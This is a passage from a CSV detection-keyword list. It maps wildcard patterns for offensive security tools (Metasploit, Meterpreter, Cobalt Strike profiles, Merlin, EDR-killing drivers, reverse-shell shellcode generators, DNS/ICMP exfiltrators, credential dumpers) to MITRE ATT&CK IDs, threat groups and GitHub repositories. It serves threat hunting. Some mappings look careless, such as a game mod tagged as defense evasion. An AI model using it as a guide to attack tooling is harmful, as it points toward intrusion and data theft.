TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*merlinServer-Linux*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/Ne0nd0g/merlin,1,1,N/A,10,10,4618,763,2023-08-27T15:47:13Z,2017-01-06T11:18:20Z -*merlinServerLog.txt*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*mertdas/RedPersist*,offensive_tool_keyword,RedPersist,RedPersist is a Windows Persistence tool written in C#,T1053 - T1547 - T1112,TA0004 - TA0005 - TA0040,N/A,N/A,Persistence,https://github.com/mertdas/RedPersist,1,1,N/A,10,2,133,19,2023-09-25T19:58:47Z,2023-08-13T22:10:46Z -*mertdas/SharpLDAP*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,1,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*mertdas/SharpTerminator*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*MessageBox.Show*Pwned*,offensive_tool_keyword,ysoserial.net,Deserialization payload generator for a variety of .NET formatters,T1059.007 - T1027.002 - 
T1059.001,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/pwntester/ysoserial.net,1,0,N/A,10,10,2723,442,2023-06-27T12:08:11Z,2017-09-18T17:48:08Z -*messagebox_reflective.dll*,offensive_tool_keyword,SharPyShell,SharPyShell - tiny and obfuscated ASP.NET webshell for C# web,T1100 - T1059 - T1505,TA0002 - TA0003 - TA0004,N/A,N/A,Web Attacks,https://github.com/antonioCoco/SharPyShell,1,1,N/A,N/A,9,809,144,2023-09-27T08:48:31Z,2019-03-10T22:09:40Z -*met_inject.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*metagoofil*,offensive_tool_keyword,metagoofil,Metagoofil is a tool for extracting metadata of public documents (pdf.doc.xls.ppt..etc) availables in the target websites.This information could be useful because you can get valid usernames. people names. for using later in bruteforce password attacks (vpn. ftp. webapps). the tool will also extracts interesting paths of the documents. where we can get shared resources names. server names... etc.,T1213 - T1596 - T1083 - T1082,TA0007 - TA0009 - TA0004,N/A,N/A,Information Gathering,https://github.com/laramies/metagoofi,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*metame -i *.exe*,offensive_tool_keyword,metame,metame is a metamorphic code engine for arbitrary executables,T1027 - T1059.003 - T1140,TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/a0rtega/metame,1,0,N/A,N/A,6,508,96,2019-10-06T18:24:14Z,2016-08-07T13:56:57Z -*Metasploit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*metasploit.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit/framework*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit/peass.rb*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*metasploit_framework.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit-framework*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*metasploit-framework*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*metasploitframework*.msi*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*MetasploitPayload.ps1*,offensive_tool_keyword,empire,Empire scripts paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1149,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*metatwin.ps1*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*metatwin-master*,offensive_tool_keyword,metatwin,The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another,T1553.002 - T1114.001 - T1564.003,TA0006 - TA0010,N/A,N/A,Exploitation tools,https://github.com/threatexpress/metatwin,1,1,N/A,9,4,303,72,2022-05-18T18:32:51Z,2017-10-08T13:26:00Z -*meterpreter*.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*meterpreter.*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*Meterpreter.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*meterpreter.sl*,offensive_tool_keyword,armitage,Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. 
recommends exploits and exposes the advanced capabilities of the framework ,T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002,TA0002 - TA0008 - TA0005 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/r00t0v3rr1d3/armitage,1,1,N/A,N/A,1,81,15,2022-12-06T00:17:23Z,2022-01-23T17:32:01Z -*meterpreter_*.rb,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*meterpreter_loader*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*METERPRETER_STAGER*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation 
tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*MeteTool*,offensive_tool_keyword,MeteTool,Metatool Minetest mod provides API for registering metadata manipulation tools and other tools primarily focused on special node data operations.,T1059.003 - T1064 - T1135 - T1059.007,TA0002 - TA0003 - TA0004,N/A,N/A,Defense Evasion,https://github.com/S-S-X/metatool,1,0,N/A,N/A,1,2,1,2023-06-10T06:24:14Z,2020-05-09T19:09:17Z -*methodHash*528465795*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,0,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*methods::dns::dns_exfiltrator*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*methods::https::https_exfiltrator*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*methods::icmp::icmp_exfiltrator*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*Metro-Holografix/CSExec*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - 
T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*Metro-Holografix/Dinjector*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*metsrv.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*metterpreter*,offensive_tool_keyword,metasploit-payloads,shell payload,T1059.001 - T1027 - T1210.001,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation 
tools,https://github.com/rapid7/metasploit-payloads,1,1,N/A,N/A,10,1555,675,2023-10-02T13:11:58Z,2014-04-03T21:18:24Z -*MFASweep.ps1*,offensive_tool_keyword,FMFASweep,A tool for checking if MFA is enabled on multiple Microsoft Services,T1595 - T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*mgeeky/PackMyPayload*,offensive_tool_keyword,PackMyPayload,A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats,T1027 - T1036 - T1048 - T1070 - T1096 - T1195,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/mgeeky/PackMyPayload/,1,1,N/A,10,8,726,123,2023-09-14T23:45:52Z,2022-02-08T19:26:28Z -*mgeeky/RedWarden*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*mhaskar/Octopus*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*mhngpdlhojliikfknhfaglpnddniijfh*,greyware_tool_keyword,WorkingVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*mhuzaifi0604/spellbound*,offensive_tool_keyword,spellbound,Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ,T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005,TA0011 - TA0009 - TA0010 - TA0002 - TA0005,N/A,N/A,C2,https://github.com/mhuzaifi0604/spellbound,1,1,N/A,10,10,37,3,2023-09-22T10:52:53Z,2023-09-19T14:45:15Z -*mhydeath.exe*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*mhydeath-master*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*micahvandeusen/gMSADumper*,offensive_tool_keyword,gMSADumper,Lists who can read any gMSA password blobs and parses them if the current user has access.,T1552.001 - T1003.001,TA0006,N/A,N/A,Credential 
Access,https://github.com/micahvandeusen/gMSADumper,1,1,N/A,N/A,2,190,34,2023-08-23T13:32:49Z,2021-04-10T00:15:24Z -*micr0 shell.py*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*micr0_shell-main*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*micr0shell.py *,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*microbrownys.strangled.net*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*MicroBurst.psm1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-Az.psm1*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - 
TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-AzureAD*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-AzureREST*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-AzureRM*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*MicroBurst-master*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation 